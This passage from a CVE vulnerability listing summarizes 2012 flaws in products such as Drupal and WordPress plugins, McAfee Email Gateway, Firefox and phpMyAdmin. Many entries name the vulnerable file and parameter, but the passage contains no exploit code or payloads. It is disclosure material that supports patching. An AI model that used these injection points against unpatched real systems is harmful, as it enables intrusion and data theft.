attackers to inject arbitrary web script or HTML via the UserName parameter. [CVE-2012-4744] Cross-site scripting (XSS) vulnerability in ssearch.php in the Siche search module 0.5 for Zeroboard allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2012-4742] The web_node_register function in web.pm in PacketFence before 3.0.2 might allow remote attackers to execute arbitrary code via unspecified vectors. [CVE-2012-4740] Cross-site scripting (XSS) vulnerability in the captive portal in PacketFence before 3.3.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-4739] Multiple cross-site scripting (XSS) vulnerabilities in Barracuda SSL VPN before 2.2.2.203 (2012-07-05) allow remote attackers to inject arbitrary web script or HTML via the (1) policyLaunching, (2) resourcePrefix, or (3) actionPath parameter in showUserResourceCategories.do [CVE-2012-4689] Integer overflow in CimWebServer.exe in GE Intelligent Platforms Proficy HMI/SCADA - CIMPLICITY 4.01 through 8.0, and Proficy Process Systems with CIMPLICITY, allows remote attackers to cause a denial of service (daemon crash) via a malformed HTTP request. [CVE-2012-4685] Cross-site scripting (XSS) vulnerability in Arbor Networks Peakflow SP 5.1.1 before patch 6, 5.5 before patch 4, and 5.6.0 before patch 1 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index. [CVE-2012-4679] Cross-site scripting (XSS) vulnerability in admin/login.php in Newscoop before 3.5.5 allows remote attackers to inject arbitrary web script or HTML via the f_user_name parameter. [CVE-2012-4675] Cross-site scripting (XSS) vulnerability in PluXml 5.1.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to file update. [CVE-2012-4668] Cross-site scripting (XSS) vulnerability in Roundcube Webmail 0.8.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the signature in an email. [CVE-2012-4667] Multiple cross-site scripting (XSS) vulnerabilities in SquidClamav 5.x before 5.8 allow remote attackers to inject arbitrary web script or HTML via the (1) url, (2) virus, (3) source, or (4) user parameter to (a) clwarn.cgi, (b) clwarn.cgi.de_DE, (c) clwarn.cgi.en_EN, (d) clwarn.cgi.fr_FR, (e) clwarn.cgi.pt_BR, or (f) clwarn.cgi.ru_RU in cgi-bin/. [CVE-2012-4655] The WebLaunch feature in Cisco Secure Desktop before 3.6.6020 does not properly validate binaries that are received by the downloader process, which allows remote attackers to execute arbitrary code via vectors involving (1) ActiveX or (2) Java components, aka Bug IDs CSCtz76128 and CSCtz78204. [CVE-2012-4620] Cisco IOS 12.2 and 15.0 through 15.2 on Cisco 10000 series routers, when a tunnel interface exists, allows remote attackers to cause a denial of service (interface queue wedge) via tunneled (1) GRE/IP, (2) IPIP, or (3) IPv6 in IPv4 packets, aka Bug ID CSCts66808. [CVE-2012-4616] Directory traversal vulnerability in the Web UI in EMC Data Protection Advisor (DPA) 5.6 through SP1, 5.7 through SP1, and 5.8 through SP4 allows remote attackers to read arbitrary files via unspecified vectors. [CVE-2012-4612] Cross-site scripting (XSS) vulnerability in EMC RSA Data Protection Manager Appliance and Software Server 2.7.x and 3.x before 3.2.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-4611] Multiple cross-site scripting (XSS) vulnerabilities in EMC RSA Adaptive Authentication On-Premise (AAOP) before 7.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-4605] The default configuration of the SMTP component in Websense Email Security 6.1 through 7.3 enables weak SSL ciphers in the "SurfControl plc\SuperScout Email Filter\SMTP" registry key, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data. [CVE-2012-4604] The TRITON management console in Websense Web Security before 7.6 Hotfix 24 allows remote attackers to bypass authentication and read arbitrary reports via a crafted uid field, in conjunction with a crafted userRoles field, in a cookie, as demonstrated by a request to explorer_wse/favorites.exe. [CVE-2012-4602] Multiple cross-site scripting (XSS) vulnerabilities in admin/code/tce_select_users_popup.php in Nicola Asuni TCExam before 11.3.009 allow remote attackers to inject arbitrary web script or HTML via the (1) cid or (2) uids parameter. [CVE-2012-4600] Cross-site scripting (XSS) vulnerability in Open Ticket Request System (OTRS) Help Desk 2.4.x before 2.4.14, 3.0.x before 3.0.16, and 3.1.x before 3.1.10, when Firefox or Opera is used, allows remote attackers to inject arbitrary web script or HTML via an e-mail message body with nested HTML tags. [CVE-2012-4599] McAfee SmartFilter Administration, and SmartFilter Administration Bess Edition, before 4.2.1.01 does not require authentication for access to the JBoss Remote Method Invocation (RMI) interface, which allows remote attackers to execute arbitrary code via a crafted .war file. [CVE-2012-4598] An unspecified ActiveX control in McAfee Virtual Technician (MVT) before 6.4, and ePO-MVT, allows remote attackers to execute arbitrary code or cause a denial of service (Internet Explorer crash) via a crafted web site. [CVE-2012-4597] Cross-site scripting (XSS) vulnerability in McAfee Email and Web Security (EWS) 5.5 through Patch 6 and 5.6 through Patch 3, and McAfee Email Gateway (MEG) 7.0.0 and 7.0.1, allows remote attackers to inject arbitrary web script or HTML via vectors related to the McAfee Security Appliance Management Console/Dashboard. [CVE-2012-4595] McAfee Email and Web Security (EWS) 5.5 through Patch 6 and 5.6 through Patch 3, and McAfee Email Gateway (MEG) 7.0.0 and 7.0.1, allows remote attackers to bypass authentication and obtain an admin session ID via unspecified vectors. [CVE-2012-4590] Multiple cross-site scripting (XSS) vulnerabilities in About.aspx in the Portal in McAfee Enterprise Mobility Manager (EMM) before 10.0 might allow remote attackers to inject arbitrary web script or HTML via the (1) User Agent or (2) Connection variable. [CVE-2012-4586] McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 before Patch 3, and McAfee Email Gateway (MEG) 7.0 before Patch 1, accesses files with the privileges of the root user, which allows remote authenticated users to bypass intended permission settings by requesting a file. [CVE-2012-4585] McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 before Patch 3, and McAfee Email Gateway (MEG) 7.0 before Patch 1, allows remote authenticated users to read arbitrary files via a crafted URL. [CVE-2012-4584] McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 before Patch 3, and McAfee Email Gateway (MEG) 7.0 before Patch 1, does not properly encrypt system-backup data, which makes it easier for remote authenticated users to obtain sensitive information by reading a backup file, as demonstrated by obtaining password hashes. [CVE-2012-4583] McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 before Patch 3, and McAfee Email Gateway (MEG) 7.0 before Patch 1, allows remote authenticated users to obtain the session tokens of arbitrary users by navigating within the Dashboard. [CVE-2012-4582] McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 before Patch 3, and McAfee Email Gateway (MEG) 7.0 before Patch 1, allows remote authenticated users to reset the passwords of arbitrary administrative accounts via unspecified vectors. [CVE-2012-4581] McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 before Patch 3, and McAfee Email Gateway (MEG) 7.0 before Patch 1, does not disable the server-side session token upon the closing of the Management Console/Dashboard, which makes it easier for remote attackers to hijack sessions by capturing a session cookie and then modifying the response to a login attempt, related to a "Logout Failure" issue. [CVE-2012-4580] Cross-site scripting (XSS) vulnerability in McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 before Patch 3, and McAfee Email Gateway (MEG) 7.0 before Patch 1, allows remote attackers to inject arbitrary web script or HTML via vectors related to the McAfee Security Appliance Management Console/Dashboard. [CVE-2012-4579] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 3.5.x before 3.5.2.2 allow remote authenticated users to inject arbitrary web script or HTML via a Table Operations (1) TRUNCATE or (2) DROP link for a crafted table name, (3) the Add Trigger popup within a Triggers page that references crafted table names, (4) an invalid trigger-creation attempt for a crafted table name, (5) crafted data in a table, or (6) a crafted tooltip label name during GIS data visualization, a different issue than CVE-2012-4345. [CVE-2012-4563] Cross-site scripting (XSS) vulnerability in Google Web Toolkit (GWT) 2.4 Beta and release candidates before 2.4.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query. [CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors. [CVE-2012-4551] Use-after-free vulnerability in libunity-webapps before 2.4.1 allows remote attackers to cause a denial of service (memory corruption and crash) and possibly execute arbitrary code via a crafted web site, related to "certain hash tables." [CVE-2012-4543] Multiple cross-site scripting (XSS) vulnerabilities in Red Hat Certificate System (RHCS) before 8.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) pageStart or (2) pageSize to the displayCRL script, or (3) nonce variable to the profileProcess script. [CVE-2012-4541] Cross-site scripting (XSS) vulnerability in Piwik before 1.9 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-4540] Off-by-one error in the invoke function in IcedTeaScriptablePluginObject.cc in IcedTea-Web 1.1.x before 1.1.7, 1.2.x before 1.2.2, and 1.3.x before 1.3.1 allows remote attackers to obtain sensitive information, cause a denial of service (crash), or possibly execute arbitrary code via a crafted webpage that triggers a heap-based buffer overflow, related to an error message and a "triggering event attached to applet." [CVE-2012-4533] Cross-site scripting (XSS) vulnerability in the "extra" details in the DiffSource._get_row function in lib/viewvc.py in ViewVC 1.0.x before 1.0.13 and 1.1.x before 1.1.16 allows remote authenticated users with repository commit access to inject arbitrary web script or HTML via the "function name" line. [CVE-2012-4532] Cross-site scripting (XSS) vulnerability in modules/mod_languages/tmpl/default.php in the Language Switcher module for Joomla! 2.5.x before 2.5.7 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index.php. NOTE: some of these details are obtained from third party information. [CVE-2012-4531] Cross-site scripting (XSS) vulnerability in Joomla! 2.5.x before 2.5.7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-4514] rendering/render_replaced.cpp in Konqueror in KDE before 4.9.3 allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted web page, related to "trying to reuse a frame with a null part." [CVE-2012-4511] services/flickr/flickr.c in libsocialweb before 0.25.21 automatically connects to Flickr when no Flickr account is set, which might allow remote attackers to obtain sensitive information via a man-in-the-middle (MITM) attack. [CVE-2012-4497] Cross-site scripting (XSS) vulnerability in the "3 slide gallery" in the Elegant Theme module 7.x-1.x before 7.x-1.0 for Drupal allows remote authenticated users with the "administer themes" permission to inject arbitrary web script or HTML via a slide URL. [CVE-2012-4496] Cross-site scripting (XSS) vulnerability in the Custom Publishing Options module 6.x-1.x before 6.x-1.4 for Drupal allows remote authenticated users with the "administer nodes" permission to inject arbitrary web script or HTML via the status labels parameter. [CVE-2012-4492] Multiple cross-site scripting (XSS) vulnerabilities in the Shorten URLs module 6.x-1.x before 6.x-1.13 and 7.x-1.x before 7.x-1.2 for Drupal allow remote authenticated users with certain permissions to inject arbitrary web script or HTML via unspecified vectors to the (1) report or (2) Custom Services List page. [CVE-2012-4490] Multiple cross-site scripting (XSS) vulnerabilities in the Excluded Users module 6.x-1.x before 6.x-1.1 for Drupal allow remote attackers to inject arbitrary web script or HTML via a (1) user name or (2) email address. [CVE-2012-4489] Open redirect vulnerability in the securelogin_secure_redirect function in the Secure Login module 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the q parameter. [CVE-2012-4485] Multiple cross-site scripting (XSS) vulnerabilities in the galleryformatter_field_formatter_view functiuon in galleryformatter.tpl.php the Gallery formatter module before 7.x-1.2 for Drupal allow remote authenticated users with permissions to create a node or entity to inject arbitrary web script or HTML via the (1) title or (2) alt parameter. [CVE-2012-4476] Cross-site scripting (XSS) vulnerability in the Drag & Drop Gallery module 6.x for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-4474] Multiple cross-site scripting (XSS) vulnerabilities in the Colorbox Node module 7.x-2.x before 7.x-2.2 for Drupal allow remote attackers to inject arbitrary web script or HTML via unspecified parameters. [CVE-2012-4469] Cross-site scripting (XSS) vulnerability in the Hashcash module 6.x-2.x before 6.x-2.6 and 7.x-2.x before 7.x-2.2 for Drupal, when "Log failed hashcash" is enabled, allows remote attackers to inject arbitrary web script or HTML via an invalid token, which is not properly handled when administrators use the Database logging module. [CVE-2012-4468] Cross-site scripting (XSS) vulnerability in the Privatemsg module 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via a user name in a private message. [CVE-2012-4437] Cross-site scripting (XSS) vulnerability in the SmartyException class in Smarty (aka smarty-php) before 3.1.12 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors that trigger a Smarty exception. [CVE-2012-4427] The gnome-shell plugin 3.4.1 in GNOME allows remote attackers to force the download and installation of arbitrary extensions from extensions.gnome.org via a crafted web page. [CVE-2012-4402] webservice/lib.php in Moodle 2.1.x before 2.1.8, 2.2.x before 2.2.5, and 2.3.x before 2.3.2 does not properly restrict the use of web-service tokens, which allows remote authenticated users to run arbitrary external-service functions via a token intended for only one service. [CVE-2012-4397] Multiple cross-site scripting (XSS) vulnerabilities in ownCloud before 4.0.1 allow remote attackers to inject arbitrary web script or HTML via the (1) calendar displayname to part.choosecalendar.rowfields.php or (2) part.choosecalendar.rowfields.shared.php in apps/calendar/templates/ [CVE-2012-4396] Multiple cross-site scripting (XSS) vulnerabilities in ownCloud before 4.0.2 allow remote attackers to inject arbitrary web script or HTML via the (1) file names to apps/user_ldap/settings.php [CVE-2012-4395] Cross-site scripting (XSS) vulnerability in index.php in ownCloud before 4.0.3 allows remote attackers to inject arbitrary web script or HTML via the redirect_url parameter. [CVE-2012-4394] Cross-site scripting (XSS) vulnerability in apps/files/js/filelist.js in ownCloud before 4.0.5 allows remote attackers to inject arbitrary web script or HTML via the file parameter. [CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-4352] Multiple cross-site scripting (XSS) vulnerabilities in Stoneware webNetwork 6.1 before SP1 allow remote attackers to inject arbitrary web script or HTML via the blogName parameter to (1) community/blog.jsp or (2) community/blogSearch.jsp, the (3) calendarType or (4) monthNumber parameter to community/calendar.jsp, or the (5) flag parameter to swDashboard/ajax/setAppFlag.jsp. [CVE-2012-4345] Multiple cross-site scripting (XSS) vulnerabilities in the Database Structure page in phpMyAdmin 3.4.x before 3.4.11.1 and 3.5.x before 3.5.2.2 allow remote authenticated users to inject arbitrary web script or HTML via (1) a crafted table name during table creation, or a (2) Empty link or (3) Drop link for a crafted table name. [CVE-2012-4344] Cross-site scripting (XSS) vulnerability in Ipswitch WhatsUp Gold 15.02 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving the SNMP system name of the attacking host. [CVE-2012-4342] Multiple cross-site scripting (XSS) vulnerabilities in Gallery 3 before 3.0.4 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-4340] Cross-site scripting (XSS) vulnerability in Sybase EAServer before 6.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-4336] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Flogr 2.5.6 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the PATH_INFO or (2) an arbitrary parameter. [CVE-2012-4303] Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 11.1.1.6.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Content Server. [CVE-2012-4283] Cross-site scripting (XSS) vulnerability in the Login With Ajax plugin before 3.0.4.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the callback parameter. [CVE-2012-4278] Multiple cross-site scripting (XSS) vulnerabilities in Free Realty 3.1-0.6 allow remote attackers to inject arbitrary web script or HTML via the (1) notes parameter to (a) admin/agenteditor.php [CVE-2012-4277] Cross-site scripting (XSS) vulnerability in the smarty_function_html_options_optoutput function in distribution/libs/plugins/function.html_options.php in Smarty before 3.1.8 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-4275] Cross-site scripting (XSS) vulnerability in Hitachi IT Operations Director 02-50-01 through 02-50-07, 03-00 before 03-00-08 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-4273] Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter. [CVE-2012-4272] Multiple cross-site scripting (XSS) vulnerabilities in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the "processing of the buttons of Xing and Pinterest". [CVE-2012-4271] Multiple cross-site scripting (XSS) vulnerabilities in bad-behavior-wordpress-admin.php in the Bad Behavior plugin before 2.0.47 and 2.2.x before 2.2.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) PATH_INFO, (2) httpbl_key, (3) httpbl_maxage, (4) httpbl_threat, (5) reverse_proxy_addresses, or (6) reverse_proxy_header parameter. [CVE-2012-4270] Cross-site scripting (XSS) vulnerability in eFront 3.6.11 allows remote authenticated users to inject arbitrary web script or HTML via the subject box of a message. [CVE-2012-4268] Cross-site scripting (XSS) vulnerability in bulletproof-security/admin/options.php in the BulletProof Security plugin before .47.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the HTTP_ACCEPT_ENCODING header. [CVE-2012-4267] Cross-site scripting (XSS) vulnerability in user/register in Sockso 1.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the name parameter. [CVE-2012-4266] Cross-site scripting (XSS) vulnerability in client_details.php in Proman Xpress 5.0.1 allows remote attackers to inject arbitrary web script or HTML via the cl_comments parameter. NOTE: some of these details are obtained from third party information. [CVE-2012-4264] Multiple cross-site scripting (XSS) vulnerabilities in the Better WP Security (better_wp_security) plugin before 3.2.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "server variables," a different vulnerability than CVE-2012-4263. [CVE-2012-4263] Cross-site scripting (XSS) vulnerability in inc/admin/content.php in the Better WP Security (better_wp_security) plugin before 3.2.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the HTTP_USER_AGENT header. [CVE-2012-4262] Multiple cross-site scripting (XSS) vulnerabilities in myCare2x allow remote attackers to inject arbitrary web script or HTML via the (1) name_last, (2) name_first, (3) name_middle, or (4) name_maiden parameter to modules/patient/mycare_pid.php [CVE-2012-4259] Cross-site scripting (XSS) vulnerability in the contacts in (1) XPhone UC Web and the (2) web frontend for XPhone Virtual Directory in C4B XPhone Unified Communications (UC) 2011 Web 4.1.890S R1 allows remote attackers to inject arbitrary web script or HTML via the company name. NOTE: some of these details are obtained from third party information. [CVE-2012-4251] Multiple cross-site scripting (XSS) vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to inject arbitrary web script or HTML via the (1) page parameter to index.php, (2) phase parameter to install.php, (3) tablename or (4) dbid parameter to sql.php, or (5) filename parameter to restore.php in learn/cubemail/. [CVE-2012-4248] The Amazon Kindle Touch before 5.1.2 does not properly restrict access to the libkindleplugin.so NPAPI plugin interface, which might allow remote attackers to have an unspecified impact via vectors involving the (1) dev.log, (2) lipc.set, (3) lipc.get, or (4) todo.scheduleItems method, a different vulnerability than CVE-2012-4249. [CVE-2012-4247] Multiple cross-site scripting (XSS) vulnerabilities in lists/admin/index.php in phpList before 2.10.19 allow remote attackers to inject arbitrary web script or HTML via the (1) remote_user, (2) remote_database, (3) remote_userprefix, (4) remote_password, or (5) remote_prefix parameter to the import4 page [CVE-2012-4246] Multiple cross-site scripting (XSS) vulnerabilities in lists/admin/index.php in phpList before 2.10.19 allow remote attackers to inject arbitrary web script or HTML via the (1) page parameter [CVE-2012-4242] Cross-site scripting (XSS) vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page. [CVE-2012-4238] Cross-site scripting (XSS) vulnerability in admin/code/tce_edit_answer.php in TCExam before 11.3.008 allows remote authenticated users with level 5 or greater permissions to inject arbitrary web script or HTML via the question_subject_id parameter. [CVE-2012-4236] Cross-site scripting (XSS) vulnerability in the refresh_page function in application/modules/_main/views/_top.php in Total Shop UK eCommerce Open Source before 2.1.2_p1 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. [CVE-2012-4231] Cross-site scripting (XSS) vulnerability in admin/index.php in jCore before 1.0pre2 allows remote attackers to inject arbitrary web script or HTML via the path parameter. [CVE-2012-4208] The XrayWrapper implementation in Mozilla Firefox before 17.0, Thunderbird before 17.0, and SeaMonkey before 2.14 does not consider the compartment during property filtering, which allows remote attackers to bypass intended chrome-only restrictions on reading DOM object properties via a crafted web site. [CVE-2012-4198] The User.get method in Bugzilla/WebService/User.pm in Bugzilla 3.7.x and 4.0.x before 4.0.9, 4.1.x and 4.2.x before 4.2.4, and 4.3.x and 4.4.x before 4.4rc1 has a different outcome for a groups request depending on whether a group exists, which allows remote authenticated users to discover private group names by observing whether a call throws an error. [CVE-2012-4195] The nsLocation::CheckURL function in Mozilla Firefox before 16.0.2, Firefox ESR 10.x before 10.0.10, Thunderbird before 16.0.2, Thunderbird ESR 10.x before 10.0.10, and SeaMonkey before 2.13.2 does not properly determine the calling document and principal in its return value, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via a crafted web site, and makes it easier for remote attackers to execute arbitrary JavaScript code by leveraging certain add-on behavior. [CVE-2012-4193] Mozilla Firefox before 16.0.1, Firefox ESR 10.x before 10.0.9, Thunderbird before 16.0.1, Thunderbird ESR 10.x before 10.0.9, and SeaMonkey before 2.13.1 omit a security check in the defaultValue function during the unwrapping of security wrappers, which allows remote attackers to bypass the Same Origin Policy and read the properties of a Location object, or execute arbitrary JavaScript code, via a crafted web site. [CVE-2012-4192] Mozilla Firefox 16.0, Thunderbird 16.0, and SeaMonkey 2.13 allow remote attackers to bypass the Same Origin Policy and read the properties of a Location object via a crafted web site, a related issue to CVE-2012-4193. [CVE-2012-4191] The mozilla::net::FailDelayManager::Lookup function in the WebSockets implementation in Mozilla Firefox before 16.0.1, Thunderbird before 16.0.1, and SeaMonkey before 2.13.1 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unspecified vectors. [CVE-2012-4189] Cross-site scripting (XSS) vulnerability in Bugzilla 4.1.x and 4.2.x before 4.2.4, and 4.3.x and 4.4.x before 4.4rc1, allows remote attackers to inject arbitrary web script or HTML via a field value that is not properly handled during construction of a tabular report, as demonstrated by the Version field. [CVE-2012-4184] The Chrome Object Wrapper (COW) implementation in Mozilla Firefox before 16.0, Firefox ESR 10.x before 10.0.8, Thunderbird before 16.0, Thunderbird ESR 10.x before 10.0.8, and SeaMonkey before 2.13 does not prevent access to properties of a prototype for a standard class, which allows remote attackers to execute arbitrary JavaScript code with chrome privileges via a crafted web site. [CVE-2012-4178] SQL injection vulnerability in spywall/includes/deptUploads_data.php in Symantec Web Gateway 5.0.3.18 allows remote attackers to execute arbitrary SQL commands via the groupid parameter. [CVE-2012-4177] The web browser plugin for Ubisoft Uplay PC before 2.0.4 allows remote attackers to execute arbitrary programs via the -orbit_exe_path command line argument. [CVE-2012-4146] Opera before 12.01 allows remote attackers to cause a denial of service (application crash) via a crafted web site, as demonstrated by the Lenovo "Shop now" page. [CVE-2012-4071] Cross-site scripting (XSS) vulnerability in the comments module in the RSGallery2 (com_rsgallery2) component before 2.3.0 for Joomla! 1.5.x, and before 3.2.0 for Joomla! 2.5.x, allows remote attackers to inject arbitrary web script or HTML via crafted BBCode markup in a comment. [CVE-2012-4070] SQL injection vulnerability in system/src/dispatcher.php in Dir2web 3.0 allows remote attackers to execute arbitrary SQL commands via the oid parameter in a homepage action to index.php. [CVE-2012-4069] Dir2web 3.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database via a direct request for system/db/website.db. [CVE-2012-4065] Eucalyptus before 3.1.1 does not properly restrict the binding of external SOAP web-services messages, which allows remote authenticated users to bypass unspecified authorization checks and obtain direct access to a (1) Cloud Controller or (2) Walrus service via a crafted message, as demonstrated by changes to a volume, snapshot, or cloud configuration setting. [CVE-2012-4064] Eucalyptus before 3.1.1 does not properly restrict the binding of external SOAP web-services messages, which allows remote authenticated users to gain privileges by sending a message to (1) Cloud Controller or (2) Walrus with the internal message format and a modified user id. [CVE-2012-4058] Cross-site scripting (XSS) vulnerability in SocketMail Pro 2.2.9 allows remote attackers to inject arbitrary web script or HTML via the subject of an email. [CVE-2012-4052] Multiple cross-site scripting (XSS) vulnerabilities in Jease before 2.9, when creating a comment, allow remote attackers to inject arbitrary web script or HTML via the (1) author, (2) subject, or (3) comment parameter. [CVE-2012-4051] Multiple cross-site request forgery (CSRF) vulnerabilities in editAccount.html in the JAMF Software Server (JSS) interface in JAMF Casper Suite before 8.61 allow remote attackers to hijack the authentication of administrators for requests that (1) create user accounts or (2) change passwords via a Save action. [CVE-2012-4043] Cross-site scripting (XSS) vulnerability in global-protect/login.esp in Palo Alto Networks Global Protect Portal, Global Protect Gateway, and SSL VPN portals 3.1.x through 3.1.11 and 4.0.x through 4.0.5 allows remote attackers to inject arbitrary web script or HTML via the inputStr parameter in a Login action. [CVE-2012-4037] Multiple cross-site scripting (XSS) vulnerabilities in the web client in Transmission before 2.61 allow remote attackers to inject arbitrary web script or HTML via the (1) comment, (2) created by, or (3) name field in a torrent file. [CVE-2012-4033] Multiple unspecified vulnerabilities in the Zingiri Web Shop plugin before 2.4.0 for WordPress have unknown impact and attack vectors. [CVE-2012-4032] Open redirect vulnerability in the login page in WebsitePanel before 1.2.2.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in ReturnUrl to Default.aspx. [CVE-2012-4018] Cross-site scripting (XSS) vulnerability in Final Beta Laboratory MyWebSearch before 1.23 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter. [CVE-2012-4017] The jigbrowser+ application before 1.5.0 for Android does not properly implement the WebView class, which allows remote attackers to obtain sensitive information via a crafted application. [CVE-2012-4015] Cross-site scripting (XSS) vulnerability in the management screen in myLittleTools myLittleAdmin for SQL Server 2000 allows remote attackers to inject arbitrary web script or HTML via vectors that trigger a crafted database entry. [CVE-2012-4014] Unspecified vulnerability in McAfee Email Anti-virus (formerly WebShield SMTP) allows remote attackers to cause a denial of service via unknown vectors. [CVE-2012-4013] The WebView class in the Cybozu KUNAI Browser for Remote Service application beta for Android allows remote attackers to execute arbitrary JavaScript code, and obtain sensitive information, via a crafted application that places this code into a local file associated with a file: URL. [CVE-2012-4012] The WebView class in the Cybozu KUNAI application before 2.0.6 for Android allows remote attackers to execute arbitrary JavaScript code, and obtain sensitive information, via a crafted application that places this code into a local file associated with a file: URL. [CVE-2012-4011] The Cybozu KUNAI application before 2.0.6 for Android allows remote attackers to execute arbitrary Java methods, and obtain sensitive information or execute arbitrary commands, via a crafted web site. [CVE-2012-4009] The WebView class in the Cybozu Live application 1.0.4 and earlier for Android allows remote attackers to execute arbitrary JavaScript code, and obtain sensitive information, via a crafted application that places this code into a local file associated with a file: URL. [CVE-2012-4008] The Cybozu Live application 1.0.4 and earlier for Android allows remote attackers to execute arbitrary Java methods, and obtain sensitive information or execute arbitrary commands, via a crafted web site. [CVE-2012-4006] The GREE application before 1.4.0, GREE Tanken Dorirando application before 1.0.7, GREE Tsurisuta application before 1.5.0, GREE Monpura application before 1.1.1, GREE Kaizokuoukoku Columbus application before 1.3.5, GREE haconiwa application before 1.1.0, GREE Seisen Cerberus application before 1.1.0, and KDDI&GREE GREE Market application before 2.1.2 for Android do not properly implement the WebView class, which allows remote attackers to obtain sensitive information via a crafted application. [CVE-2012-4004] Cross-site scripting (XSS) vulnerability in the Sleipnir Mobile application 2.2.0 and earlier and Sleipnir Mobile Black Edition application 2.2.0 and earlier for Android allows remote attackers to inject arbitrary web script or HTML via a crafted application that interacts with an unspecified Sleipnir Mobile function. [CVE-2012-4003] Multiple cross-site scripting (XSS) vulnerabilities in GLPI-PROJECT GLPI before 0.83.3 allow remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2012-4000] Cross-site scripting (XSS) vulnerability in the print_textinputs_var function in editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php in FCKeditor 2.6.7 and earlier allows remote attackers to inject arbitrary web script or HTML via textinputs array parameters. [CVE-2012-3999] Cross-site scripting (XSS) vulnerability in admin/login.php in Sticky Notes 0.3.09062012.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the username parameter. [CVE-2012-3997] Multiple cross-site scripting (XSS) vulnerabilities in Sticky Notes before 0.2.27052012.5 allow remote attackers to inject arbitrary web script or HTML via the (1) paste_user or (2) paste_lang parameter to (a) list.php or (b) show.php. [CVE-2012-3993] The Chrome Object Wrapper (COW) implementation in Mozilla Firefox before 16.0, Firefox ESR 10.x before 10.0.8, Thunderbird before 16.0, Thunderbird ESR 10.x before 10.0.8, and SeaMonkey before 2.13 does not properly interact with failures of InstallTrigger methods, which allows remote attackers to execute arbitrary JavaScript code with chrome privileges via a crafted web site, related to an "XrayWrapper pollution" issue. [CVE-2012-3991] Mozilla Firefox before 16.0, Firefox ESR 10.x before 10.0.8, Thunderbird before 16.0, Thunderbird ESR 10.x before 10.0.8, and SeaMonkey before 2.13 do not properly restrict JSAPI access to the GetProperty function, which allows remote attackers to bypass the Same Origin Policy and possibly have unspecified other impact via a crafted web site. [CVE-2012-3989] Mozilla Firefox before 16.0, Thunderbird before 16.0, and SeaMonkey before 2.13 do not properly perform a cast of an unspecified variable during use of the instanceof operator on a JavaScript object, which allows remote attackers to execute arbitrary code or cause a denial of service (assertion failure) via a crafted web site. [CVE-2012-3987] Mozilla Firefox before 16.0 on Android assigns 